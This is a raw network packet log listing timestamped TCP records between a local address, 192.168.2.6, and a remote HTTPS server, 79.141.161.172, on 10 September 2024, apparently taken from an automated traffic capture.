                                                                                Sep 10, 2024 16:33:47.863356113 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.947916985 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.947938919 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.947999001 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.948034048 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.948054075 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.948081970 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.949089050 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.949105024 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.949155092 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.949162960 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.949187994 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.949199915 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.950954914 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.950969934 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.951025009 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.951031923 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.951064110 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.951064110 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.951869011 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.951884985 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.951939106 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.951946020 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.951968908 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.951982975 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.034766912 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.034787893 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.035053968 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.035087109 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.035602093 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.035620928 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.035700083 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.035700083 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.035711050 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.036107063 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.037642002 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.037655115 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.037730932 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.037730932 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.037739038 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.037780046 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.039042950 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.039057970 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.039096117 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.039132118 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.039135933 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.039149046 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.039165020 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.039190054 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.039402962 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.039416075 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.039493084 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.039493084 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.039501905 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.056693077 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.056710005 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.056771040 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.056783915 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.056817055 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.125448942 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.125466108 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.125593901 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.125616074 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.125969887 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.125988007 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.126070023 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.126070023 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.126079082 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.126751900 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.126765966 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.126853943 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.126853943 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.126864910 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.127506971 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.127525091 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.127589941 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.127589941 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.127597094 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.131154060 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.131166935 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.131247044 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.131247044 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.131257057 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.131706953 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.131725073 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.131795883 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.131795883 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.131802082 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.132204056 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.132216930 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.132277966 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.132277966 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.132283926 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.144336939 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.144356966 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.144442081 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.144442081 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.144452095 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.212527037 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.212551117 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.212657928 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.212657928 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.212677956 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.213030100 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.213049889 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.213116884 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.213116884 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.213124990 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.213524103 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.213540077 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.213579893 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.213587999 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.213614941 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.214023113 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.214042902 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.214143991 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.214143991 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.214152098 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.214425087 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.214440107 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.214519024 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.214519024 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.214525938 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.215039968 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.215059042 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.215264082 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.215270996 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.215348005 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.215362072 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.215434074 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.215434074 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.215441942 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.246361017 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.246391058 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.246509075 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.246509075 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.246536016 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.299424887 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.299446106 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.299616098 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.299616098 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.299644947 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.299856901 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.299875975 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.299909115 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.299918890 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.299949884 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.300416946 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.300434113 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.300518990 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.300518990 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.300528049 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.300853014 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.300870895 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.300915003 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.300921917 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.300952911 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.301263094 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.301278114 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.301364899 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.301364899 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.301373005 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.301811934 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.301831007 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.301875114 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.301882029 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.301912069 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.302340984 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.302355051 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.302419901 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.302419901 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.302428007 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.332739115 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.332757950 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.332942963 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.332942963 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.332973003 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.385993958 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.386008978 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.386193037 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.386224985 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.386511087 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.386528015 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.386600018 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.386600018 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.386610031 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.387147903 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.387161970 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.387248993 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.387248993 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.387258053 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.387641907 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.387660027 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.387697935 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.387706041 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.387736082 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.388195038 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.388207912 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.388308048 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.388317108 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.388591051 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.388608932 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.388645887 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.388653994 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.388684034 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.389177084 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.389199018 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.389235973 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.389244080 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.389273882 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.420949936 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.420977116 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.421102047 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.421102047 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.421133995 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.472726107 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.472739935 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.472886086 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.472919941 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.473270893 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.473287106 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.473388910 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.473407030 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.473457098 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.473824024 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.473835945 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.473984957 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.473999977 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.474325895 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.474342108 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.474482059 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.474498034 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.474848032 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.474859953 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.474960089 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.474960089 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.474977970 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.475406885 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.475424051 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.475827932 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.475840092 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.475841045 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.475857973 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.475949049 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.475949049 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.508917093 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.508934021 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.509702921 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.509732962 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.511084080 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.559779882 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.559796095 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.559952974 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.560022116 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.560142994 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.560292959 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.560308933 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.560389042 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.560404062 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.560731888 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.560784101 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.560797930 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.561065912 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.561079979 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.561803102 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.562475920 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.562490940 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.562669039 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.562684059 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.562808990 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.562928915 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.562943935 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.563039064 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.563039064 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.563059092 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.563287020 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.563333035 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.563349962 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.563465118 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.563477993 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.563640118 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.563726902 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.563740969 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.563852072 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.563865900 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.564188957 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.595547915 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.595562935 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.596014023 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.596080065 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.596347094 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.646771908 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.646796942 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.647145987 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.647192001 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.647216082 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.647291899 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.647337914 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.647337914 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.647730112 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.647742987 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.648125887 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.648148060 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.648199081 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.648216963 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.648297071 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.648297071 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.648314953 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.649686098 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.649698973 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.649787903 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.649787903 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.649806976 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.650140047 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.650156021 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.650202036 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.650218010 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.650269032 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.650696993 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.650710106 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.651005983 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.651021957 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.682334900 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.682357073 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.682487011 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.682487965 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.682559013 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.733870983 CEST4434973379.141.161.172192.168.2.6
